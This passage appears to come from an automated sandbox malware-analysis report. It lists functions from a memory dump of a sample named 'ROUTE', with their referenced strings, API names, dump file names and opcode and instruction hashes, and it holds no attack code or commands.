                                                                                                                            • Instruction ID: 491ee489be743a207b8b6e0a47bb9b8c9b910ce28b7e069ad004c3e64b0c43c7
                                                                                                                            • Opcode Fuzzy Hash: c304cc3d3140dfd4ff1450d64b43c43a7f585289c3078da759580000564a1298
                                                                                                                            • Instruction Fuzzy Hash: 22E1F034628741AFD728CF28C985B2AB7E4BF85324F194A5DF5A6CB2D0D774D884CB42
                                                                                                                            Function 032FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            • RTL: Resource at %p, xrefs: 03337B8E
                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03337B7F
                                                                                                                            • RTL: Re-Waiting, xrefs: 03337BAC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 0-871070163
                                                                                                                            • Opcode ID: e911ca5192457d430106a3d2097a7b85d6013b638a8d9bc632d9354305b3fe99
                                                                                                                            • Instruction ID: 328c9e606c14fa34baa2ac9a8ebfa860d995bb7990c3bb172dfb6e5479f3dc14
                                                                                                                            • Opcode Fuzzy Hash: e911ca5192457d430106a3d2097a7b85d6013b638a8d9bc632d9354305b3fe99
                                                                                                                            • Instruction Fuzzy Hash: A241F4357207029FD724CE29CC90B6AF7E5EF89710F040A2DF956DB680DB70E4458B91
                                                                                                                            Function 032FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0333728C
                                                                                                                            Strings
                                                                                                                            • RTL: Resource at %p, xrefs: 033372A3
                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03337294
                                                                                                                            • RTL: Re-Waiting, xrefs: 033372C1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                            • Opcode ID: 6fde0b5029a6636259e33714fb427a224fc2b8dd8360b383dcd9c73e2f48b810
                                                                                                                            • Instruction ID: e2c1a4dc71a7f683dd71b3c0b3bbceb8115b5831a030226aa174b47127fcee93
                                                                                                                            • Opcode Fuzzy Hash: 6fde0b5029a6636259e33714fb427a224fc2b8dd8360b383dcd9c73e2f48b810
                                                                                                                            • Instruction Fuzzy Hash: 6D411F79B14702AFD720CE24CC81F6AF7A5FB85710F184629F955EB680DB20F8828BD0
                                                                                                                            Function 03372300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ___swprintf_l
                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                            • Opcode ID: d8daeb2015fb649e6146f1bfc3e5c30231ebe9db14d42e6e07a15e742c334c47
                                                                                                                            • Instruction ID: ab6e3f296b7e7c9e80fe3b112ae37538d2ce808cb67ed5a0cfa56cbca1b0d751
                                                                                                                            • Opcode Fuzzy Hash: d8daeb2015fb649e6146f1bfc3e5c30231ebe9db14d42e6e07a15e742c334c47
                                                                                                                            • Instruction Fuzzy Hash: C4317576A102199FDB34DF29DC80BEFB7F8EF44650F444956E849E7240EB34AA548FA0
                                                                                                                            Function 03307D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: +$-
                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction ID: 8a2e279bf65837a53f18dfab47f181431b884a01fb55d0a035d483a624b25c25
                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                            • Instruction Fuzzy Hash: BF91C470E0021A9BDF24DF69CCE06BEB7A9FF44760F18461AE865EB2D0D734A941CB50
                                                                                                                            Function 032C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.00000000033BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_3290000_ROUTE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$@
                                                                                                                            • API String ID: 0-1194432280
                                                                                                                            • Opcode ID: 41c291eee83a09bae990ae9cab362bc3b805788084ec144bcbf77da519e7201b
                                                                                                                            • Instruction ID: d9962a72efe6997309a6c6351971126e017f04bfd293f796afd7a489cd8b5ebc
                                                                                                                            • Opcode Fuzzy Hash: 41c291eee83a09bae990ae9cab362bc3b805788084ec144bcbf77da519e7201b
                                                                                                                            • Instruction Fuzzy Hash: DA811C76D102699BDB71DB54CC45BEEB7B8AB08710F0445DAE919B7240E7709EC4CFA0